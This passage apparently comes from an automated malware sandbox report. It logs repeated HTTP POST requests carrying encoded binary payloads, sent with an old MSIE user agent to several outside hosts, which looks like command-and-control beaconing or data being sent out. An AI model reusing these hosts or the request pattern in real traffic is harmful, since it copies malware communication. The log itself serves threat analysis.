6f3KTX4GK4dIuV9wSXuC4GG4nLY+wgYokhbBjLP8IcDJyUcInXQvvhA1juOtc9wQe6nCM0dbW3Sm5C/+/xhWQCgAruNq982hZMZ0u0rE8TtdjDkyw9KG+SseBzOgFPN8KgUS6Zn755XB3beKPhziQyA316Zr/TDZnQkS8t8WT1ocApdU0PqIX/Jveeyd7G1j8yjDJwuZcE2LMSsX7F/pqHx+MZSeJIWJacbqN9MaztT7q0EaQ5GFoXHLnh5lvSv1A1fpCJDmh+tHC8hTCnHFpHc+fK3lRptfkhWqqvEYYKfkTVnw6RM7uLKS/pMCLpBXSBIcfkrdrlzrjVAPj6KvNPalNS3Nv6zXlKWowHsjxrfRogXshvF4vu/ZjAUBBAuWiblhSX317BuuKAJpqxxn9/G9VzaMaR1KIlZZxAge3v91hMJmLNlr6TxOJ8l2oieUPwy9EsDv/R80Kd8lmEQfwUqBG9bSZWCuof3UgY749YaiStkrAN/wPCUnZE8Xy9h/Yp7IIjerVQhbKMi6R+LGMMnMtel9Y9lceQi1adQ6/pCTBA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 44 6c 4c 65 75 6f 76 68 4e 6f 66 4d 48 56 45 79 34 73 6d 6f 2f 76 51 44 41 52 66 52 77 6a 44 2f 37 39 74 47 52 4e 36 79 51 4c 68 4d 43 38 48 4c 49 72 42 2f 79 70 64 36 31 34 36 32 43 37 4c 54 6b 49 65 79 33 62 64 4a 50 58 33 42 49 33 53 69 36 62 74 50 59 45 54 56 41 58 68 66 6b 6a 72 57 70 54 52 6f 6e 4a 43 45 61 6d 7a 79 4a 6c 48 44 62 59 7a 47 53 33 65 6a 78 6e 51 52 57 32 59 77 47 46 43 62 74 59 6a 4a 57 56 64 4e 4f 53 4f 37 32 70 56 44 2b 69 6e 30 33 6d 64 47 50 4c 37 68 4f 77 6b 47 37 78 63 41 78 46 30 75 5a 56 36 58 41 48 72 49 4c 79 41 41 6c 73 6e 4e 4e 70 30 46 69 68 33 51 57 67 31 51 35 4d 35 71 2b 73 67 4d 35 31 61 6d 39 39 59 4f 6d 66 6a 6a 47 50 76 6e 59 61 71 75 46 4d 6b 45 52 42 73 4d 47 58 4a 45 52 78 4e 79 31 56 54 76 79 4a 71 30 44 72 63 33 41 4d 4c 37 34 30 4e 67 41 32 50 41 6a 4d 75 39 76 62 52 65 36 49 4b 75 73 61 59 61 64 32 52 69 55 2f 38 6f 50 59 55 5a 45 7a 79 48 31 4e 76 67 56 37 56 53 39 4a 32 34 4e 2f 4e 32 56 6c 4e 6f 46 67 53 59 66 79 59 58 66 64 78 41 75 71 34 71 67 34 32 36 65 4b 74 56 6b 77 34 66 34 33 34 32 32 61 6e 35 61 4d 63 6f 4b 58 70 73 70 58 6c 70 35 67 6b 66 32 30 4a 77 37 49 39 5a 38 56 4c 6e 4c 46 66 63 51 30 76 43 30 59 48 39 2f 68 55 45 4e 56 6c 66 4f 47 45 49 66 69 53 44 2f 7a 45 2b 4f 2f 70 67 65 4b 4c 33 4f 48 4b 4b 2b 55 77 58 51 41 63 32 69 78 33 6a 70 32 53 47 37 53 33 54 4e 30 64 72 62 51 6a 67 6b 77 41 58 76 49 34 48 75 6d 32 69 58 73 2f 36 35 34 67 43 2b 6c 69 58 39 57 2b 30 4d 4a 34 57 6e 59 31 50 6d 35 64 70 35 50 74 37 44 39 4f 2b 4c 44 2f 32 56 78 52 34 4e 6c 39 74 78 56 58 39 34 67 78 6b 61 72 78 48 63 6b 73 51 51 53 74 68 6c 62 41 68 47 31 71 4d 48 66 44 64 2b 59 56 79 6e 69 2b 6d 70 38 6d 63 41 33 2b 58 41 34 54 50 4c 4b 30 2f 72 47 44 74 4a 42 36 2b 32 42 30 76 54 7a 59 68 55 30 47 57 6b 43 55 75 74 64 4d 3d Data Ascii: DlLeuovhNofMHVEy4smo/vQDARfRwjD/79tGRN6yQLhMC8HLIrB/ypd61462C7LTkIey3bdJPX3BI3Si6btPYETVAXhfkjrWpTRonJCEamzyJlHDbYzGS3ejxnQRW2YwGFCbtYjJWVdNOSO72pVD+in03mdGPL7hOwkG7xcAxF0uZV6XAHrILyAAlsnNNp0Fih3QWg1Q5M5q+sgM51am99YOmfjjGPvnYaquFMkERBsMGXJERxNy1VTvyJq0Drc3AML740NgA2PAjMu9vbRe6IKusaYad2RiU/8oPYUZEzyH1NvgV7VS9J24N/N2VlNoFgSYfyYXfdxAuq4qg426eKtVkw4f43422an5aMcoKXpspXlp5gkf20Jw7I9Z8VLnLFfcQ0vC0YH9/hUENVlfOGEIfiSD/zE+O/pgeKL3OHKK+UwXQAc2ix3jp2SG7S3TN0drbQjgkwAXvI4Hum2iXs/654gC+liX9W+0MJ4WnY1Pm5dp5Pt7D9O+LD/2VxR4Nl9txVX94gxkarxHcksQQSthlbAhG1qMHfDd+YVyni+mp8mcA3+XA4TPLK0/rGDtJB6+2B0vTzYhU0GWkCUutdM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 6d 43 31 67 58 2b 62 6f 4d 34 65 4d 47 45 50 6d 67 57 74 54 68 77 6d 54 6c 38 7a 47 36 4c 49 74 65 6d 4d 39 51 51 42 4f 4e 32 35 34 32 57 79 36 7a 2b 49 4e 46 65 4c 66 63 41 6f 50 70 70 76 6c 59 37 75 61 4d 4c 74 2b 53 51 48 46 33 4a 75 31 47 50 56 68 75 6e 67 66 79 55 33 77 53 6f 6a 58 4b 50 67 50 35 61 4b 6b 2b 35 4b 77 44 46 36 63 30 31 6a 45 59 67 63 4d 78 66 78 6a 42 66 56 41 45 68 73 51 77 6f 55 78 4f 71 5a 39 50 6d 71 4a 39 41 55 4d 2b 2f 70 78 64 31 50 42 65 57 2f 6c 78 57 5a 37 35 72 76 51 46 48 38 61 6d 6b 52 47 61 58 30 6f 59 43 36 70 70 76 56 57 70 6a 72 4b 72 73 50 53 41 32 45 41 75 73 30 34 49 31 35 64 68 67 36 44 51 4f 66 5a 39 6e 31 34 73 58 4b 74 4b 4b 72 55 4c 73 4c 77 49 5a 6d 34 34 4a 50 36 74 54 78 68 4a 49 33 76 4b 6b 50 69 42 6b 59 48 49 46 6c 35 65 5a 4d 4a 4d 46 42 77 4f 2f 47 78 59 30 71 69 73 4d 67 6d 65 58 66 73 4f 2b 65 44 39 55 53 68 49 42 45 6e 54 5a 75 30 39 74 53 53 74 4f 45 51 75 66 77 7a 51 65 5a 67 36 51 68 57 64 37 49 46 50 69 37 53 6f 6f 78 47 53 72 4f 53 37 31 71 2f 44 6d 7a 75 66 69 50 55 4a 70 6b 47 67 2b 6b 48 75 50 69 48 64 6a 44 46 32 65 76 6d 64 58 70 69 46 49 31 6f 49 6f 32 73 79 4d 62 70 6c 43 62 48 50 50 31 4c 34 57 63 7a 50 69 41 72 51 32 6d 54 78 32 44 7a 2f 7a 6b 7a 34 36 49 59 43 2f 67 66 75 4a 66 56 54 62 47 70 6d 49 32 71 39 57 73 72 54 5a 33 58 61 67 6a 4c 33 77 48 54 61 74 50 63 5a 46 7a 71 62 57 55 4b 53 74 4e 36 42 4f 6f 41 31 5a 2f 32 65 2f 6c 74 52 6d 42 48 68 70 77 33 30 6b 4a 71 55 6e 49 73 78 30 6c 68 4e 6c 33 6a 7a 6a 2f 49 37 6c 57 63 57 75 38 4f 49 74 70 6a 6e 48 37 50 61 35 30 62 34 56 2f 7a 6c 6b 66 52 50 41 6d 70 35 6e 46 4f 4a 43 48 6e 53 49 37 72 51 54 32 75 71 79 2f 71 6a 57 35 55 69 73 39 74 72 31 64 4e 6d 79 79 75 72 4e 4e 71 4e 64 63 68 58 79 31 37 42 65 6d 47 4c 66 67 6a 4c 75 41 74 41 74 4d 3d Data Ascii: mC1gX+boM4eMGEPmgWtThwmTl8zG6LItemM9QQBON2542Wy6z+INFeLfcAoPppvlY7uaMLt+SQHF3Ju1GPVhungfyU3wSojXKPgP5aKk+5KwDF6c01jEYgcMxfxjBfVAEhsQwoUxOqZ9PmqJ9AUM+/pxd1PBeW/lxWZ75rvQFH8amkRGaX0oYC6ppvVWpjrKrsPSA2EAus04I15dhg6DQOfZ9n14sXKtKKrULsLwIZm44JP6tTxhJI3vKkPiBkYHIFl5eZMJMFBwO/GxY0qisMgmeXfsO+eD9UShIBEnTZu09tSStOEQufwzQeZg6QhWd7IFPi7SooxGSrOS71q/DmzufiPUJpkGg+kHuPiHdjDF2evmdXpiFI1oIo2syMbplCbHPP1L4WczPiArQ2mTx2Dz/zkz46IYC/gfuJfVTbGpmI2q9WsrTZ3XagjL3wHTatPcZFzqbWUKStN6BOoA1Z/2e/ltRmBHhpw30kJqUnIsx0lhNl3jzj/I7lWcWu8OItpjnH7Pa50b4V/zlkfRPAmp5nFOJCHnSI7rQT2uqy/qjW5Uis9tr1dNmyyurNNqNdchXy17BemGLfgjLuAtAtM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vitaindu.comCache-Control: no-cacheData Raw: 61 31 4f 61 41 41 44 56 4d 49 64 45 54 65 49 6a 30 38 54 48 57 7a 50 45 47 4b 76 6f 68 34 6f 6d 4e 46 7a 55 2b 6d 49 38 42 74 37 44 44 49 66 46 2f 6b 4a 31 78 42 52 4b 58 54 59 52 4f 6b 75 54 37 56 41 35 71 7a 2f 6d 2f 35 79 67 52 62 58 78 30 4e 42 6d 54 64 61 6a 48 32 38 68 35 72 6b 42 48 30 70 75 6c 34 49 75 7a 75 49 48 64 5a 64 7a 54 51 41 66 6f 64 54 71 79 33 4c 77 71 34 55 44 78 58 73 73 38 33 2b 45 44 49 2b 56 45 79 56 4f 55 4a 72 67 63 44 6f 5a 72 46 30 57 7a 4e 2b 39 41 56 71 72 33 62 34 4a 6f 4e 50 4f 63 59 77 50 78 6b 72 57 38 52 53 63 62 4c 37 74 6a 66 30 68 68 75 64 35 4a 51 37 52 56 50 41 53 64 38 57 32 52 38 36 4c 79 53 59 6b 68 33 52 33 78 37 5a 6b 42 4c 62 71 63 4a 6d 67 64 48 50 4b 7a 79 41 36 4c 32 36 59 69 55 2b 47 61 75 42 4b 38 67 2f 47 4c 73 31 78 49 67 39 42 41 34 50 75 58 59 4b 47 72 64 6f 34 72 39 48 37 61 39 39 75 75 68 64 77 72 4d 55 46 51 4d 4a 47 73 2b 33 66 6f 58 39 34 41 76 48 49 77 42 43 30 71 7a 6d 4a 39 70 61 34 33 71 6d 57 76 55 47 70 49 4e 4d 4e 62 4b 59 59 68 74 51 51 34 6f 2b 64 53 71 71 56 42 71 69 64 62 79 37 36 71 52 64 52 68 67 55 37 31 53 66 68 4c 76 4d 6b 32 49 31 52 74 6c 79 70 62 52 62 79 63 78 6a 55 49 30 52 36 6a 61 68 71 46 69 42 65 46 78 4c 35 39 4d 52 59 59 57 52 47 6c 4d 67 47 64 59 2f 7a 6e 57 72 66 67 4a 51 68 6a 5a 35 7a 63 38 36 37 2f 4b 37 37 34 4a 6a 46 7a 70 71 33 71 30 53 4f 43 72 71 66 4a 45 31 36 35 75 4b 74 44 58 52 43 35 61 30 6f 4a 68 4e 42 67 70 48 47 6f 73 2b 49 56 68 43 49 46 45 56 42 32 50 6e 32 6d 48 58 49 30 46 33 2b 32 7a 44 77 77 51 57 69 38 53 41 71 6b 37 53 6b 4d 6f 59 4b 37 2f 63 79 31 79 67 4d 30 51 77 61 39 41 38 68 56 55 77 74 6b 57 57 58 71 63 41 39 67 33 79 58 7a 53 76 45 77 4f 79 42 79 71 43 39 6d 54 63 36 71 43 59 3d Data Ascii: a1OaAADVMIdETeIj08THWzPEGKvoh4omNFzU+mI8Bt7DDIfF/kJ1xBRKXTYROkuT7VA5qz/m/5ygRbXx0NBmTdajH28h5rkBH0pul4IuzuIHdZdzTQAfodTqy3Lwq4UDxXss83+EDI+VEyVOUJrgcDoZrF0WzN+9AVqr3b4JoNPOcYwPxkrW8RScbL7tjf0hhud5JQ7RVPASd8W2R86LySYkh3R3x7ZkBLbqcJmgdHPKzyA6L26YiU+GauBK8g/GLs1xIg9BA4PuXYKGrdo4r9H7a99uuhdwrMUFQMJGs+3foX94AvHIwBC0qzmJ9pa43qmWvUGpINMNbKYYhtQQ4o+dSqqVBqidby76qRdRhgU71SfhLvMk2I1RtlypbRbycxjUI0R6jahqFiBeFxL59MRYYWRGlMgGdY/znWrfgJQhjZ5zc867/K774JjFzpq3q0SOCrqfJE165uKtDXRC5a0oJhNBgpHGos+IVhCIFEVB2Pn2mHXI0F3+2zDwwQWi8SAqk7SkMoYK7/cy1ygM0Qwa9A8hVUwtkWWXqcA9g3yXzSvEwOyByqC9mTc6qCY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 36 66 33 4b 54 58 34 47 4b 34 64 49 75 56 39 77 53 58 75 43 34 47 47 34 6e 4c 59 2b 77 67 59 6f 6b 68 62 42 6a 4c 50 38 49 63 44 4a 79 55 63 49 6e 58 51 76 76 68 41 31 6a 75 4f 74 63 39 77 51 65 36 6e 43 4d 30 64 62 57 33 53 6d 35 43 2f 2b 2f 78 68 57 51 43 67 41 72 75 4e 71 39 38 32 68 5a 4d 5a 30 75 30 72 45 38 54 74 64 6a 44 6b 79 77 39 4b 47 2b 53 73 65 42 7a 4f 67 46 50 4e 38 4b 67 55 53 36 5a 6e 37 35 35 58 42 33 62 65 4b 50 68 7a 69 51 79 41 33 31 36 5a 72 2f 54 44 5a 6e 51 6b 53 38 74 38 57 54 31 6f 63 41 70 64 55 30 50 71 49 58 2f 4a 76 65 65 79 64 37 47 31 6a 38 79 6a 44 4a 77 75 5a 63 45 32 4c 4d 53 73 58 37 46 2f 70 71 48 78 2b 4d 5a 53 65 4a 49 57 4a 61 63 62 71 4e 39 4d 61 7a 74 54 37 71 30 45 61 51 35 47 46 6f 58 48 4c 6e 68 35 6c 76 53 76 31 41 31 66 70 43 4a 44 6d 68 2b 74 48 43 38 68 54 43 6e 48 46 70 48 63 2b 66 4b 33 6c 52 70 74 66 6b 68 57 71 71 76 45 59 59 4b 66 6b 54 56 6e 77 36 52 4d 37 75 4c 4b 53 2f 70 4d 43 4c 70 42 58 53 42 49 63 66 6b 72 64 72 6c 7a 72 6a 56 41 50 6a 36 4b 76 4e 50 61 6c 4e 53 33 4e 76 36 7a 58 6c 4b 57 6f 77 48 73 6a 78 72 66 52 6f 67 58 73 68 76 46 34 76 75 2f 5a 6a 41 55 42 42 41 75 57 69 62 6c 68 53 58 33 31 37 42 75 75 4b 41 4a 70 71 78 78 6e 39 2f 47 39 56 7a 61 4d 61 52 31 4b 49 6c 5a 5a 78 41 67 65 33 76 39 31 68 4d 4a 6d 4c 4e 6c 72 36 54 78 4f 4a 38 6c 32 6f 69 65 55 50 77 79 39 45 73 44 76 2f 52 38 30 4b 64 38 6c 6d 45 51 66 77 55 71 42 47 39 62 53 5a 57 43 75 6f 66 33 55 67 59 37 34 39 59 61 69 53 74 6b 72 41 4e 2f 77 50 43 55 6e 5a 45 38 58 79 39 68 2f 59 70 37 49 49 6a 65 72 56 51 68 62 4b 4d 69 36 52 2b 4c 47 4d 4d 6e 4d 74 65 6c 39 59 39 6c 63 65 51 69 31 61 64 51 36 2f 70 43 54 42 41 3d 3d Data Ascii: 6f3KTX4GK4dIuV9wSXuC4GG4nLY+wgYokhbBjLP8IcDJyUcInXQvvhA1juOtc9wQe6nCM0dbW3Sm5C/+/xhWQCgAruNq982hZMZ0u0rE8TtdjDkyw9KG+SseBzOgFPN8KgUS6Zn755XB3beKPhziQyA316Zr/TDZnQkS8t8WT1ocApdU0PqIX/Jveeyd7G1j8yjDJwuZcE2LMSsX7F/pqHx+MZSeJIWJacbqN9MaztT7q0EaQ5GFoXHLnh5lvSv1A1fpCJDmh+tHC8hTCnHFpHc+fK3lRptfkhWqqvEYYKfkTVnw6RM7uLKS/pMCLpBXSBIcfkrdrlzrjVAPj6KvNPalNS3Nv6zXlKWowHsjxrfRogXshvF4vu/ZjAUBBAuWiblhSX317BuuKAJpqxxn9/G9VzaMaR1KIlZZxAge3v91hMJmLNlr6TxOJ8l2oieUPwy9EsDv/R80Kd8lmEQfwUqBG9bSZWCuof3UgY749YaiStkrAN/wPCUnZE8Xy9h/Yp7IIjerVQhbKMi6R+LGMMnMtel9Y9lceQi1adQ6/pCTBA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 44 6c 4c 65 75 6f 76 68 4e 6f 66 4d 48 56 45 79 34 73 6d 6f 2f 76 51 44 41 52 66 52 77 6a 44 2f 37 39 74 47 52 4e 36 79 51 4c 68 4d 43 38 48 4c 49 72 42 2f 79 70 64 36 31 34 36 32 43 37 4c 54 6b 49 65 79 33 62 64 4a 50 58 33 42 49 33 53 69 36 62 74 50 59 45 54 56 41 58 68 66 6b 6a 72 57 70 54 52 6f 6e 4a 43 45 61 6d 7a 79 4a 6c 48 44 62 59 7a 47 53 33 65 6a 78 6e 51 52 57 32 59 77 47 46 43 62 74 59 6a 4a 57 56 64 4e 4f 53 4f 37 32 70 56 44 2b 69 6e 30 33 6d 64 47 50 4c 37 68 4f 77 6b 47 37 78 63 41 78 46 30 75 5a 56 36 58 41 48 72 49 4c 79 41 41 6c 73 6e 4e 4e 70 30 46 69 68 33 51 57 67 31 51 35 4d 35 71 2b 73 67 4d 35 31 61 6d 39 39 59 4f 6d 66 6a 6a 47 50 76 6e 59 61 71 75 46 4d 6b 45 52 42 73 4d 47 58 4a 45 52 78 4e 79 31 56 54 76 79 4a 71 30 44 72 63 33 41 4d 4c 37 34 30 4e 67 41 32 50 41 6a 4d 75 39 76 62 52 65 36 49 4b 75 73 61 59 61 64 32 52 69 55 2f 38 6f 50 59 55 5a 45 7a 79 48 31 4e 76 67 56 37 56 53 39 4a 32 34 4e 2f 4e 32 56 6c 4e 6f 46 67 53 59 66 79 59 58 66 64 78 41 75 71 34 71 67 34 32 36 65 4b 74 56 6b 77 34 66 34 33 34 32 32 61 6e 35 61 4d 63 6f 4b 58 70 73 70 58 6c 70 35 67 6b 66 32 30 4a 77 37 49 39 5a 38 56 4c 6e 4c 46 66 63 51 30 76 43 30 59 48 39 2f 68 55 45 4e 56 6c 66 4f 47 45 49 66 69 53 44 2f 7a 45 2b 4f 2f 70 67 65 4b 4c 33 4f 48 4b 4b 2b 55 77 58 51 41 63 32 69 78 33 6a 70 32 53 47 37 53 33 54 4e 30 64 72 62 51 6a 67 6b 77 41 58 76 49 34 48 75 6d 32 69 58 73 2f 36 35 34 67 43 2b 6c 69 58 39 57 2b 30 4d 4a 34 57 6e 59 31 50 6d 35 64 70 35 50 74 37 44 39 4f 2b 4c 44 2f 32 56 78 52 34 4e 6c 39 74 78 56 58 39 34 67 78 6b 61 72 78 48 63 6b 73 51 51 53 74 68 6c 62 41 68 47 31 71 4d 48 66 44 64 2b 59 56 79 6e 69 2b 6d 70 38 6d 63 41 33 2b 58 41 34 54 50 4c 4b 30 2f 72 47 44 74 4a 42 36 2b 32 42 30 76 54 7a 59 68 55 30 47 57 6b 43 55 75 74 64 4d 3d Data Ascii: DlLeuovhNofMHVEy4smo/vQDARfRwjD/79tGRN6yQLhMC8HLIrB/ypd61462C7LTkIey3bdJPX3BI3Si6btPYETVAXhfkjrWpTRonJCEamzyJlHDbYzGS3ejxnQRW2YwGFCbtYjJWVdNOSO72pVD+in03mdGPL7hOwkG7xcAxF0uZV6XAHrILyAAlsnNNp0Fih3QWg1Q5M5q+sgM51am99YOmfjjGPvnYaquFMkERBsMGXJERxNy1VTvyJq0Drc3AML740NgA2PAjMu9vbRe6IKusaYad2RiU/8oPYUZEzyH1NvgV7VS9J24N/N2VlNoFgSYfyYXfdxAuq4qg426eKtVkw4f43422an5aMcoKXpspXlp5gkf20Jw7I9Z8VLnLFfcQ0vC0YH9/hUENVlfOGEIfiSD/zE+O/pgeKL3OHKK+UwXQAc2ix3jp2SG7S3TN0drbQjgkwAXvI4Hum2iXs/654gC+liX9W+0MJ4WnY1Pm5dp5Pt7D9O+LD/2VxR4Nl9txVX94gxkarxHcksQQSthlbAhG1qMHfDd+YVyni+mp8mcA3+XA4TPLK0/rGDtJB6+2B0vTzYhU0GWkCUutdM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheData Raw: 78 4a 53 4f 5a 33 47 4d 49 34 64 4f 73 6d 76 63 6b 42 73 37 2b 73 70 35 2b 43 4f 76 64 6a 4d 6f 4e 58 49 2b 70 4d 57 44 6f 6f 34 2f 71 43 36 70 43 48 43 31 70 51 46 69 32 6e 47 30 48 50 42 48 31 73 6b 53 36 2f 69 53 37 69 73 70 4a 6b 61 36 43 79 58 4e 56 2b 61 37 63 4a 30 6c 38 34 61 39 2f 49 51 46 75 42 74 44 4f 31 35 52 33 6f 34 54 6a 4c 66 66 4a 39 51 54 54 76 2b 44 48 58 41 34 6d 74 52 32 30 2b 36 31 51 46 4d 59 35 43 55 4a 6c 59 4d 71 2b 73 49 67 58 72 66 4f 34 38 48 51 42 2b 42 4b 2b 56 54 68 4e 4c 45 37 31 6d 4a 5a 6b 38 50 50 2f 41 53 76 78 7a 6b 77 34 42 50 2f 2b 48 32 55 33 4c 70 2b 4a 53 32 7a 38 42 51 31 44 32 37 59 36 62 78 6b 6f 33 63 6c 55 36 48 4e 4e 6d 64 4f 44 64 6a 44 59 69 34 73 36 61 41 53 44 49 4f 71 65 48 46 4a 5a 31 56 59 57 77 78 62 64 46 61 4b 74 33 41 4e 4c 77 36 37 2b 6e 64 4c 46 6f 4e 71 6c 44 6c 6b 79 35 54 4f 79 64 5a 32 37 53 49 6b 7a 39 59 77 56 6e 61 78 41 64 6c 67 2b 46 6a 56 46 41 2b 50 66 37 6e 46 44 2b 6a 41 6b 36 32 41 5a 53 57 52 2f 61 73 65 69 48 35 51 4a 71 59 68 64 57 63 6f 6e 4b 2b 50 59 4d 4d 64 62 45 76 43 44 39 34 70 36 63 7a 46 4f 73 55 57 75 32 63 62 49 52 71 6b 42 39 2f 35 4b 78 78 65 71 49 36 39 36 58 75 6d 74 68 74 37 47 50 4c 47 32 4e 37 59 33 46 38 78 37 37 74 75 33 72 53 46 39 4a 64 44 72 42 52 75 49 6d 75 48 42 57 4e 4a 33 45 33 38 65 4d 39 30 6b 4a 4e 68 41 6c 53 6b 77 49 6a 42 47 50 73 4b 66 6f 54 30 42 5a 73 6e 6a 47 57 47 4d 43 6c 76 68 43 5a 74 68 4a 51 30 6c 7a 6a 45 6e 50 7a 4c 6b 4f 36 31 51 65 32 6b 53 37 4d 6e 33 68 4c 59 2f 55 4e 4c 51 2b 6f 33 56 32 31 4b 53 5a 66 63 4a 43 70 50 47 58 46 32 55 64 37 55 4b 39 55 50 2b 62 46 6e 39 58 78 53 54 52 66 32 4c 66 38 56 6c 54 4f 31 2f 77 65 67 38 5a 45 66 37 67 77 59 66 51 3d 3d Data Ascii: xJSOZ3GMI4dOsmvckBs7+sp5+COvdjMoNXI+pMWDoo4/qC6pCHC1pQFi2nG0HPBH1skS6/iS7ispJka6CyXNV+a7cJ0l84a9/IQFuBtDO15R3o4TjLffJ9QTTv+DHXA4mtR20+61QFMY5CUJlYMq+sIgXrfO48HQB+BK+VThNLE71mJZk8PP/ASvxzkw4BP/+H2U3Lp+JS2z8BQ1D27Y6bxko3clU6HNNmdODdjDYi4s6aASDIOqeHFJZ1VYWwxbdFaKt3ANLw67+ndLFoNqlDlky5TOydZ27SIkz9YwVnaxAdlg+FjVFA+Pf7nFD+jAk62AZSWR/aseiH5QJqYhdWconK+PYMMdbEvCD94p6czFOsUWu2cbIRqkB9/5KxxeqI696Xumtht7GPLG2N7Y3F8x77tu3rSF9JdDrBRuImuHBWNJ3E38eM90kJNhAlSkwIjBGPsKfoT0BZsnjGWGMClvhCZthJQ0lzjEnPzLkO61Qe2kS7Mn3hLY/UNLQ+o3V21KSZfcJCpPGXF2Ud7UK9UP+bFn9XxSTRf2Lf8VlTO1/weg8ZEf7gwYfQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valselit.comCache-Control: no-cacheData Raw: 6a 5a 55 68 51 4e 2f 56 53 34 64 4c 64 61 4a 69 50 71 6c 47 4e 57 68 2f 42 4b 75 31 54 2b 4c 30 67 77 74 51 71 45 38 30 65 30 72 59 55 43 4d 56 63 79 30 37 5a 47 63 65 65 76 59 56 47 64 2f 6e 6c 34 52 31 66 55 6e 36 58 47 71 6d 57 6c 39 68 48 54 55 6a 4c 69 4c 41 30 2b 6b 35 47 36 6d 6d 47 64 62 70 7a 30 63 31 69 33 52 41 52 42 74 71 39 77 6f 46 57 55 30 6a 42 68 46 69 34 70 69 4e 78 36 35 73 51 57 6b 52 76 42 4a 75 71 39 37 58 73 6d 71 53 4f 72 54 67 4c 52 44 6c 47 47 35 7a 62 53 31 30 2f 42 65 62 4e 61 67 4e 34 56 5a 48 49 37 6e 74 78 39 74 64 76 62 33 49 62 78 50 43 42 74 34 64 6e 51 41 62 41 61 51 62 44 64 42 61 64 30 47 4d 79 5a 49 76 52 50 2f 7a 42 76 55 75 61 4e 49 68 52 4a 78 31 37 35 51 36 79 32 33 32 66 4c 62 74 6a 71 6c 38 75 34 2f 49 66 79 52 56 62 43 38 72 52 37 37 35 65 30 69 35 37 54 54 6b 5a 63 41 6d 59 52 4e 30 59 79 39 54 41 2f 4b 61 54 4f 69 6b 38 47 61 6f 71 39 76 72 61 50 70 7a 4c 76 67 54 34 39 54 2f 2b 64 72 59 49 70 56 73 51 4e 46 71 34 38 50 56 48 4f 66 34 35 36 5a 77 39 4e 63 51 72 4b 47 4c 6c 70 65 4f 7a 4a 39 71 76 36 4b 64 44 34 51 43 56 75 6e 2b 62 46 59 66 72 56 50 6f 41 58 6e 6b 48 54 4a 69 31 41 34 47 35 70 58 6d 6c 6e 55 34 62 78 73 65 32 7a 43 7a 51 74 64 68 57 4c 71 48 31 4c 69 38 68 63 6f 64 66 35 79 5a 73 69 49 75 33 78 6b 4e 52 53 6b 57 43 4b 49 4f 6e 4a 7a 30 6d 34 63 7a 69 52 78 59 59 46 41 65 54 66 37 6e 38 46 37 33 2b 64 63 69 6c 77 6a 7a 5a 71 58 33 66 70 55 34 6d 56 50 6c 52 71 47 34 34 45 67 54 37 2f 4a 4d 58 58 33 70 42 39 32 72 44 4f 55 73 78 56 76 6c 59 45 6b 30 34 42 51 77 31 65 50 59 46 79 77 37 66 4c 2b 56 62 65 68 4d 79 38 61 57 41 74 66 67 58 32 6d 4b 51 67 3d 3d Data Ascii: jZUhQN/VS4dLdaJiPqlGNWh/BKu1T+L0gwtQqE80e0rYUCMVcy07ZGceevYVGd/nl4R1fUn6XGqmWl9hHTUjLiLA0+k5G6mmGdbpz0c1i3RARBtq9woFWU0jBhFi4piNx65sQWkRvBJuq97XsmqSOrTgLRDlGG5zbS10/BebNagN4VZHI7ntx9tdvb3IbxPCBt4dnQAbAaQbDdBad0GMyZIvRP/zBvUuaNIhRJx175Q6y232fLbtjql8u4/IfyRVbC8rR775e0i57TTkZcAmYRN0Yy9TA/KaTOik8Gaoq9vraPpzLvgT49T/+drYIpVsQNFq48PVHOf456Zw9NcQrKGLlpeOzJ9qv6KdD4QCVun+bFYfrVPoAXnkHTJi1A4G5pXmlnU4bxse2zCzQtdhWLqH1Li8hcodf5yZsiIu3xkNRSkWCKIOnJz0m4cziRxYYFAeTf7n8F73+dcilwjzZqX3fpU4mVPlRqG44EgT7/JMXX3pB92rDOUsxVvlYEk04BQw1ePYFyw7fL+VbehMy8aWAtfgX2mKQg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 67 4e 4d 63 51 6c 54 6d 53 34 66 57 37 6f 56 77 4c 78 31 44 31 36 64 6b 6b 63 33 4d 4a 65 32 68 79 44 43 41 6d 31 6c 68 56 67 42 6a 32 41 33 46 6a 62 75 78 5a 53 5a 51 69 58 62 6d 49 77 79 71 77 39 79 4c 2b 5a 39 70 34 72 2b 49 52 42 36 63 61 39 72 56 49 31 63 31 2f 4f 54 4e 50 73 52 41 78 4a 78 31 35 76 52 38 56 46 47 45 67 46 74 70 47 6b 35 65 6f 6f 30 32 4b 53 53 6d 58 49 34 36 39 78 67 56 58 30 77 53 45 59 54 76 76 4a 63 43 47 4d 59 38 37 32 4a 62 74 49 79 38 